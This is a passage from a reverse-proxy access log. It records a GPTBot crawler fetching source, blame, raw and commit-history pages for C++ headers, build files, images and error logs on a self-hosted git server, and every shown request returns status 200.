3.16] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/8d291f57b63b0b2be49f636657ef35169d418129/C++Project/industrial-comm/cpp/include/transport_error.hpp" +[17/Feb/2026:15:49:03 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/C++Project/industrial-comm/cpp/include/logger.hpp?display=rendered" [Client 74.7.227.38] [Length 11078] [Gzip 3.05] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/C++Project/industrial-comm/cpp/include/logger.hpp" +[17/Feb/2026:15:49:04 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/C++Project/industrial-comm/cpp/include/logger.hpp" [Client 74.7.227.38] [Length 9987] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/C++Project/industrial-comm/cpp/include/logger.hpp" +[17/Feb/2026:15:49:04 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/C++Project/industrial-comm/cpp/include/transport_state.hpp" [Client 74.7.227.38] [Length 122] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/C++Project/industrial-comm/cpp/include/transport_state.hpp" +[17/Feb/2026:15:49:05 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/C++Project/industrial-comm/cpp/include/transport_state.hpp" [Client 74.7.227.38] [Length 10524] [Gzip 3.38] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/C++Project/industrial-comm/cpp/include/transport_state.hpp" +[17/Feb/2026:15:49:06 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/8d291f57b63b0b2be49f636657ef35169d418129/C++Project/industrial-comm/cpp/include/transport_error.hpp" [Client 74.7.227.38] [Length 12833] [Gzip 6.06] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/8d291f57b63b0b2be49f636657ef35169d418129/C++Project/industrial-comm/cpp/include/transport_error.hpp" +[17/Feb/2026:15:49:06 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/C++Project/industrial-comm/cpp/include/logger.hpp" [Client 74.7.227.38] [Length 12703] [Gzip 6.01] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/C++Project/industrial-comm/cpp/include/logger.hpp" +[17/Feb/2026:15:49:07 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/C++Project/industrial-comm/cpp/include/transport_state.hpp" [Client 74.7.227.38] [Length 9995] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/C++Project/industrial-comm/cpp/include/transport_state.hpp" +[17/Feb/2026:15:49:07 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/C++Project/industrial-comm/cpp/include/vendor_formats.hpp" [Client 74.7.227.38] [Length 558] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/C++Project/industrial-comm/cpp/include/vendor_formats.hpp" +[17/Feb/2026:15:49:08 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/8d291f57b63b0b2be49f636657ef35169d418129/C++Project/industrial-comm/cpp/include/transport_error.hpp" [Client 74.7.227.38] [Length 886] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/8d291f57b63b0b2be49f636657ef35169d418129/C++Project/industrial-comm/cpp/include/transport_error.hpp" +[17/Feb/2026:15:49:08 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/C++Project/industrial-comm/cpp/include/logger.hpp" [Client 74.7.227.38] [Length 1143] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/C++Project/industrial-comm/cpp/include/logger.hpp" +[17/Feb/2026:15:49:09 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/C++Project/industrial-comm/cpp/include/vendor_formats.hpp" [Client 74.7.227.38] [Length 9956] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/C++Project/industrial-comm/cpp/include/vendor_formats.hpp" +[17/Feb/2026:15:49:09 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/C++Project/industrial-comm/cpp/include/vendor_formats.hpp" [Client 74.7.227.38] [Length 11317] [Gzip 4.56] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/C++Project/industrial-comm/cpp/include/vendor_formats.hpp" +[17/Feb/2026:15:49:10 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/fd51c36120e0bc559f08a35a65c69351c564222a/html/assets/images/ControlRoom7.png?display=rendered" [Client 74.7.227.38] [Length 10866] [Gzip 2.97] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/fd51c36120e0bc559f08a35a65c69351c564222a/html/assets/images/ControlRoom7.png" +[17/Feb/2026:15:49:10 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/fd51c36120e0bc559f08a35a65c69351c564222a/html/assets/images/ControlRoom5.png?display=rendered" [Client 74.7.227.38] [Length 10858] [Gzip 2.97] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/fd51c36120e0bc559f08a35a65c69351c564222a/html/assets/images/ControlRoom5.png" +[17/Feb/2026:15:49:11 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/fd51c36120e0bc559f08a35a65c69351c564222a/html/assets/images/ControlRoom2.png?display=rendered" [Client 74.7.227.38] [Length 10862] [Gzip 2.97] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/fd51c36120e0bc559f08a35a65c69351c564222a/html/assets/images/ControlRoom2.png" +[17/Feb/2026:15:49:11 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/fd51c36120e0bc559f08a35a65c69351c564222a/html/assets/images/ControlRoom3.png?display=rendered" [Client 74.7.227.38] [Length 10862] [Gzip 2.97] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/fd51c36120e0bc559f08a35a65c69351c564222a/html/assets/images/ControlRoom3.png" +[17/Feb/2026:15:49:12 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/fd51c36120e0bc559f08a35a65c69351c564222a/html/assets/images/ControlRoom1.png?display=rendered" [Client 74.7.227.38] [Length 10861] [Gzip 2.97] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/fd51c36120e0bc559f08a35a65c69351c564222a/html/assets/images/ControlRoom1.png" +[17/Feb/2026:15:49:12 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/fd51c36120e0bc559f08a35a65c69351c564222a/html/assets/images/ControlRoom4.png?display=rendered" [Client 74.7.227.38] [Length 10862] [Gzip 2.97] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/fd51c36120e0bc559f08a35a65c69351c564222a/html/assets/images/ControlRoom4.png" +[17/Feb/2026:15:49:13 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/b288a964d15beae093be1af2456d67149d3aafa1/npm/data/logs/proxy-host-2_error.log" [Client 74.7.227.38] [Length 14423] [Gzip 4.98] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/b288a964d15beae093be1af2456d67149d3aafa1/npm/data/logs" +[17/Feb/2026:15:49:14 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/b288a964d15beae093be1af2456d67149d3aafa1/npm/data/logs/proxy-host-4_error.log" [Client 74.7.227.38] [Length 27991] [Gzip 9.92] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/b288a964d15beae093be1af2456d67149d3aafa1/npm/data/logs" +[17/Feb/2026:15:49:14 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/b288a964d15beae093be1af2456d67149d3aafa1/npm/data/logs/proxy-host-1_error.log" [Client 74.7.227.38] [Length 19760] [Gzip 9.36] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/b288a964d15beae093be1af2456d67149d3aafa1/npm/data/logs" +[17/Feb/2026:15:49:15 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/b288a964d15beae093be1af2456d67149d3aafa1/npm/data/logs/proxy-host-3_error.log" [Client 74.7.227.38] [Length 14003] [Gzip 4.42] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/b288a964d15beae093be1af2456d67149d3aafa1/npm/data/logs" +[17/Feb/2026:15:49:15 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/src/commit/adf9a81cb0ea52c9fa32f352b5800e021665bb47/asset_pilot_docker/templates/index.html?display=source" [Client 74.7.227.38] [Length 15742] [Gzip 5.60] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/adf9a81cb0ea52c9fa32f352b5800e021665bb47/asset_pilot_docker/templates/index.html" +[17/Feb/2026:15:49:16 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/7e5f452449b5385fa46a3a589ed6aac00a02734a/html/index.html?display=source" [Client 74.7.227.38] [Length 30932] [Gzip 9.13] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/7e5f452449b5385fa46a3a589ed6aac00a02734a/html/index.html" +[17/Feb/2026:15:49:16 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/C++Project/industrial-comm/build/cpp" [Client 74.7.227.38] [Length 11061] [Gzip 3.06] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/C++Project/industrial-comm/build" +[17/Feb/2026:15:49:17 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/C++Project/industrial-comm/build/cpp" [Client 74.7.227.38] [Length 11059] [Gzip 3.06] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/C++Project/industrial-comm/build" +[17/Feb/2026:15:49:17 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/48e58ba35a3d0cdc46729773d610323f6cca6b3a/C++Project/industrial-comm/build/build.ninja" [Client 74.7.227.38] [Length 16414] [Gzip 5.60] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/48e58ba35a3d0cdc46729773d610323f6cca6b3a/C++Project/industrial-comm/build" +[17/Feb/2026:15:49:18 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/C++Project/industrial-comm/cpp/CMakeLists.txt" [Client 74.7.227.38] [Length 11620] [Gzip 3.26] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/C++Project/industrial-comm/cpp" +[17/Feb/2026:15:49:18 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/8d46844ad0dee496f6e51052dc6f6f06f211c977/C++Project/industrial-comm/build/cpp" [Client 74.7.227.38] [Length 10635] [Gzip 3.00] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/8d46844ad0dee496f6e51052dc6f6f06f211c977/C++Project/industrial-comm/build" +[17/Feb/2026:15:49:19 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/blame/commit/b288a964d15beae093be1af2456d67149d3aafa1/npm/data/logs/proxy-host-2_error.log" [Client 74.7.227.38] [Length 15203] [Gzip 7.24] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/b288a964d15beae093be1af2456d67149d3aafa1/npm/data/logs/proxy-host-2_error.log" +[17/Feb/2026:15:49:20 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/blame/commit/b288a964d15beae093be1af2456d67149d3aafa1/npm/data/logs/proxy-host-4_error.log" [Client 74.7.227.38] [Length 33050] [Gzip 14.26] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/b288a964d15beae093be1af2456d67149d3aafa1/npm/data/logs/proxy-host-4_error.log" +[17/Feb/2026:15:49:20 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/blame/commit/b288a964d15beae093be1af2456d67149d3aafa1/npm/data/logs/proxy-host-1_error.log" [Client 74.7.227.38] [Length 22997] [Gzip 13.90] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/b288a964d15beae093be1af2456d67149d3aafa1/npm/data/logs/proxy-host-1_error.log" +[17/Feb/2026:15:49:21 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/blame/commit/b288a964d15beae093be1af2456d67149d3aafa1/npm/data/logs/proxy-host-3_error.log" [Client 74.7.227.38] [Length 14239] [Gzip 6.33] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/b288a964d15beae093be1af2456d67149d3aafa1/npm/data/logs/proxy-host-3_error.log" +[17/Feb/2026:15:49:21 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/commit/b288a964d15beae093be1af2456d67149d3aafa1/npm/data/logs/proxy-host-3_error.log" [Client 74.7.227.38] [Length 10325] [Gzip 3.48] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/b288a964d15beae093be1af2456d67149d3aafa1/npm/data/logs/proxy-host-3_error.log" +[17/Feb/2026:15:49:22 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/commit/b288a964d15beae093be1af2456d67149d3aafa1/npm/data/logs/proxy-host-2_error.log" [Client 74.7.227.38] [Length 10129] [Gzip 3.17] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/b288a964d15beae093be1af2456d67149d3aafa1/npm/data/logs/proxy-host-2_error.log" +[17/Feb/2026:15:49:22 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/C++Project/industrial-comm/build/cpp" [Client 74.7.227.38] [Length 10203] [Gzip 3.16] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/C++Project/industrial-comm/build/cpp" +[17/Feb/2026:15:49:23 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/C++Project/industrial-comm/build/cpp" [Client 74.7.227.38] [Length 10204] [Gzip 3.15] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/C++Project/industrial-comm/build/cpp" +[17/Feb/2026:15:49:23 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/48e58ba35a3d0cdc46729773d610323f6cca6b3a/C++Project/industrial-comm/build/build.ninja" [Client 74.7.227.38] [Length 9941] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/48e58ba35a3d0cdc46729773d610323f6cca6b3a/C++Project/industrial-comm/build/build.ninja" +[17/Feb/2026:15:49:24 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/C++Project/industrial-comm/cpp/CMakeLists.txt" [Client 74.7.227.38] [Length 9935] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/C++Project/industrial-comm/cpp/CMakeLists.txt" +[17/Feb/2026:15:49:24 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/8d46844ad0dee496f6e51052dc6f6f06f211c977/C++Project/industrial-comm/build/cpp" [Client 74.7.227.38] [Length 9936] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/8d46844ad0dee496f6e51052dc6f6f06f211c977/C++Project/industrial-comm/build/cpp" +[17/Feb/2026:15:49:25 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/C++Project/industrial-comm/build/cpp/CMakeFiles" [Client 74.7.227.38] [Length 10429] [Gzip 3.05] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/C++Project/industrial-comm/build/cpp" +[17/Feb/2026:15:49:25 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/C++Project/industrial-comm/build/cpp/CMakeFiles" [Client 74.7.227.38] [Length 10428] [Gzip 3.05] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/C++Project/industrial-comm/build/cpp" +[17/Feb/2026:15:49:26 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/C++Project/industrial-comm/cpp/CMakeLists.txt" [Client 74.7.227.38] [Length 11046] [Gzip 4.02] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/C++Project/industrial-comm/cpp/CMakeLists.txt" +[17/Feb/2026:15:49:26 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/8d46844ad0dee496f6e51052dc6f6f06f211c977/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/src" [Client 74.7.227.38] [Length 10303] [Gzip 3.01] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/8d46844ad0dee496f6e51052dc6f6f06f211c977/C++Project/industrial-comm/build/cpp" +[17/Feb/2026:15:49:27 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/C++Project/industrial-comm/build/cpp/Makefile" [Client 74.7.227.38] [Length 17036] [Gzip 5.66] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/C++Project/industrial-comm/build/cpp" +[17/Feb/2026:15:49:28 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/C++Project/industrial-comm/build/cpp/Makefile" [Client 74.7.227.38] [Length 17037] [Gzip 5.66] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/C++Project/industrial-comm/build/cpp" +[17/Feb/2026:15:49:28 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/8d46844ad0dee496f6e51052dc6f6f06f211c977/C++Project/industrial-comm/build/cpp/cmake_install.cmake" [Client 74.7.227.38] [Length 12945] [Gzip 3.98] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/8d46844ad0dee496f6e51052dc6f6f06f211c977/C++Project/industrial-comm/build/cpp" +[17/Feb/2026:15:49:28 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/8d46844ad0dee496f6e51052dc6f6f06f211c977/C++Project/industrial-comm/build/cpp/libcomm_core.so" [Client 74.7.227.38] [Length 10969] [Gzip 3.01] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/8d46844ad0dee496f6e51052dc6f6f06f211c977/C++Project/industrial-comm/build/cpp" +[17/Feb/2026:15:49:29 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/C++Project/industrial-comm/build/cpp/libcomm_core.so" [Client 74.7.227.38] [Length 11010] [Gzip 3.01] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/C++Project/industrial-comm/build/cpp" +[17/Feb/2026:15:49:30 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/commit/b288a964d15beae093be1af2456d67149d3aafa1/npm/data/logs/proxy-host-4_error.log" [Client 74.7.227.38] [Length 10461] [Gzip 3.80] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/b288a964d15beae093be1af2456d67149d3aafa1/npm/data/logs/proxy-host-4_error.log" +[17/Feb/2026:15:49:30 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/commit/b288a964d15beae093be1af2456d67149d3aafa1/npm/data/logs/proxy-host-1_error.log" [Client 74.7.227.38] [Length 10323] [Gzip 